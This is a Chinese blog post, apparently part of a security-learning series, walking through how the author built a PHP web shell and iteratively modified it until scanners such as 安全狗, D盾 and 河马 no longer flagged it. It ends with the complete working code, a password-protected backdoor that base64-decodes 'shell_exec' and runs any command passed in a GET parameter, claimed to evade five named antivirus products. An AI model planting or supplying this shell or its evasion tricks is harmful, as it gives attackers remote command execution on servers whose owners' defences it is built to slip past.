信息安全从0到1玩转网络安全Web安全

从0到1学习网络安全 【实战篇 - 制作一匹过狗马】

2019-03-28  本文已影响21人  _07
研究了下过狗php小马,分享一下制作的过程

注:今后继续定期更新---“实战”!


Step1:制作了一个执行命令的小马,用查杀工具扫描一下发现河马竟然没告警...
原因可能是,我用变量代替了shell_exec 字符。
3.php
安全狗,D盾告警分别如下:
安全狗告警.png
D盾告警.png
Step2:在原有代码上添加方法把执行命令那段代码括起来,安全狗绕过。
2.php
D盾依然告警(内藏可疑变量函数):
D盾告警.png
Step3:再加一个变量,D盾依然告警但是威胁等级降低了!不过好像加这个变量确实没啥用。
1.php
D盾告警如下(变量函数):
D盾告警.png
Step4:既然变量代替shell_exec会告警,我换成数组试试:
0.php
绕过成功,根据查杀软件给出的提示想出对应的绕过方式,过狗就很简单了。
查杀软件告警.php

最终代码:

<?php   
//pwd=iChina
//测试结果通杀以下软件:360企业专业版、安全狗、河马、D盾、ESET
function payload($cmd,$pwd,$func)
{
    //执行命令
    if ($pwd=='c256b667c0bfd5b0cd0f0e77976a37e7') {
        $array = array($func,"iChina","https://www.bug1024.cn");
        $result = $array[0]($cmd);
        echo $result;
    } else {
        echo 'Password is wrong!';
    }
}
if (isset($_GET['cmd'])&&isset($_GET['pwd'])) {
    $cmd = $_GET['cmd'];
    $pwd = md5($_GET['pwd']);
    $func = base64_decode('c2hlbGxfZXhlYw==');
    payload($cmd,$pwd,$func);
} else {
    echo 'Please input password!';
}
?>
第一次写过狗马,大佬勿喷

由于小编也在学习中,写的不好请见谅。
从0到1学习网络安全 【目录】

实战环境地址群内公布!!!

白帽交流群 【简介】
感谢大家支持。

上一篇下一篇

猜你喜欢

热点阅读